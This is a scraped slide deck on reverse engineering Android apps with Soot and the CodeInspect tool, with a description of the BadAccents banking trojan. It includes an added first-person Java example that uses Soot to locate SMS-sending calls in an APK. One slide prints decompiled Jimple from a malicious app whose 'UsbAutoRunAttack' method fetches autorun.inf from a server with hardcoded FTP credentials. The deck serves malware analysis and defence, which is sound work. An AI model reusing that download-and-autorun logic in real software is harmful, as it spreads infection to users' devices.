Dismantling droids for breakfast - The current state of app reverse - - PowerPoint PPT Presentation



SLIDE 1

SECURE SOFTWARE ENGINEERING GROUP

Dismantling droids for breakfast - The current state of app reverse engineering

Siegfried Rasthofer

SLIDE 2

#whoami


  • 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr. Eric Bodden)

  • Research interest:
    • Applied software security on Android
    • Static-/dynamic code analyses
  • Android Security:
    • Found 2 AOSP exploits
    • Security Analysis of Backend-as-a-Service
    • Korea Threat investigation together with McAfee Research Lab

SLIDE 3

SLIDE 4

How easy is it to dismantle your app?

SLIDE 5

How to secure my app against piracy

I am developing an Android app and I am planning to publish it (paid app). I have heard that it is very easy to pirate Android apps (much easier than iPhone). I was wondering, from your experience or what you know, how can I increase the security of my app? I know that I can never get it 100% secured, but I want to make it harder for people to pirate it or distribute it illegally. Any ideas, experiences, comments you can share? That will be greatly appreciated. Best regards

Source: stackoverflow.com

SLIDE 6

Is it still easy to dismantle your app?

SLIDE 7

A new Binary Analysis Framework for Android and Java Bytecode


SLIDE 8

vs

SLIDE 9

Soot

SLIDE 10

Soot

Input/Output: .dex, .java, .jimple, .apk, .class

  • Various callgraph algorithms
  • Sophisticated algorithms used in compiler construction
  • Code manipulation

https://github.com/Sable/soot/wiki
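As an added example of the Soot usage this slide describes (my code, not a sample from the slides, from Soot, or from CodeInspect), the following Java program loads an APK into Soot, converts each method body to Jimple, and lists every call site of a chosen Android framework method. It assumes Soot 4.x on the classpath and an android-platforms directory (one android.jar per API level) passed on the command line; the class name, the method names and the choice of SmsManager.sendTextMessage as the triage target are my own assumptions, picked because sending SMS is one of the capabilities a reviewer typically wants to locate first when triaging a sample.

```java
// Added example (not from the slides): use Soot to load an APK and report
// every call site of a chosen framework method, e.g. SmsManager.sendTextMessage.
// Assumes Soot 4.x on the classpath and an android-platforms directory
// (the per-API-level android.jar files Soot needs to resolve framework types).
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

import soot.Body;
import soot.G;
import soot.Scene;
import soot.SootClass;
import soot.SootMethod;
import soot.Unit;
import soot.jimple.Stmt;
import soot.options.Options;

public class ApkApiCallFinder {

    // Soot signature of the framework method to locate (hypothetical triage
    // target chosen for this example; any other signature works the same way).
    static final String SEND_SMS =
        "<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,"
        + "java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>";

    /** Returns "caller signature -> callee signature" for every call to targetSig in the APK. */
    public static List<String> findCalls(String apkPath, String androidPlatforms, String targetSig) {
        G.reset();                                              // fresh Soot singleton state
        Options.v().set_src_prec(Options.src_prec_apk);         // input is an APK (dex code)
        Options.v().set_process_dir(Collections.singletonList(apkPath));
        Options.v().set_android_jars(androidPlatforms);         // dir with <api-level>/android.jar
        Options.v().set_process_multiple_dex(true);             // handle multidex APKs
        Options.v().set_allow_phantom_refs(true);               // tolerate unresolved framework classes
        Options.v().set_output_format(Options.output_format_none); // analysis only, write nothing
        Options.v().set_whole_program(false);                   // no call graph needed for this scan
        Scene.v().loadNecessaryClasses();

        List<String> hits = new ArrayList<>();
        // Copy the chain first: body creation may add phantom classes to the Scene.
        for (SootClass cls : new ArrayList<>(Scene.v().getApplicationClasses())) {
            for (SootMethod m : cls.getMethods()) {
                if (!m.isConcrete()) continue;                  // abstract/native: nothing to inspect
                Body body;
                try {
                    body = m.retrieveActiveBody();              // dex -> Jimple for this method
                } catch (RuntimeException e) {
                    continue;                                   // skip methods Soot cannot decode
                }
                for (Unit u : body.getUnits()) {
                    Stmt s = (Stmt) u;
                    if (!s.containsInvokeExpr()) continue;
                    // getMethodRef() avoids resolving the callee, which may be a phantom method
                    String callee = s.getInvokeExpr().getMethodRef().getSignature();
                    if (callee.equals(targetSig)) {
                        hits.add(m.getSignature() + " -> " + callee);
                    }
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        if (args.length < 2) {
            System.err.println("usage: ApkApiCallFinder <app.apk> <android-platforms-dir>");
            System.exit(1);
        }
        for (String hit : findCalls(args[0], args[1], SEND_SMS)) {
            System.out.println(hit);
        }
    }
}
```

Run it as `java -cp soot.jar:. ApkApiCallFinder app.apk /path/to/android-platforms`. The scan is purely syntactic (it looks at each invoke statement's declared target), so it finds direct calls only; a call reached through reflection or an obfuscated wrapper needs the call-graph and dataflow machinery the slide lists, which is what a tool built on Soot adds on top of this loop.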

SLIDE 11

Soot Jimple

SLIDE 12

public static boolean UsbAutoRunAttack(android.content.Context $param0)
{
    java.lang.String $String;
    $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>;
    ...
    staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)>($String, "autorun.inf", "ftpupper", "thisisshit007", $param0);
    return true;
}

Annotated regions: Declarations, Code, Return-Statement

SLIDE 13

Soot Jimple CodeInspect

SLIDE 14

CodeInspect

  • Jimple Code
  • Readable Files
  • Code Refactoring
  • Debugger
  • Java Source Enhancement
  • Syntax Highlighting
  • Code Manipulation
  • Dataflow Visualizer
  • Deobfuscator
  • “Region“ Detection

SLIDE 15

Let’s get started…


  1. Import APK
  2. Start Device

SLIDE 16

Infected >20,000 users

SLIDE 17

Android/BadAccents

Banking Trojan

  • Activation Component
  • SMS
  • HTTP
  • E-Mail
  • Intercept SMS
  • Intercept Call
  • Install Fake AV
  • Uninstall AV
  • File System
  • Native Code
  • User Waiting Time
  • Send SMS
  • Tapjacking Attack

SLIDE 18

Live-Demo


SLIDE 19

Future Steps


  • New Plugins under development
  • Easily add own analyses

SLIDE 20

How do I get this tool?


SLIDE 21

SLIDE 22

Siegfried Rasthofer
Secure Software Engineering Group
Email: siegfried.rasthofer@cased.de
Blog: http://sse-blog.ec-spride.de
Website: http://sse.ec-spride.de
Twitter: @CodeInspect
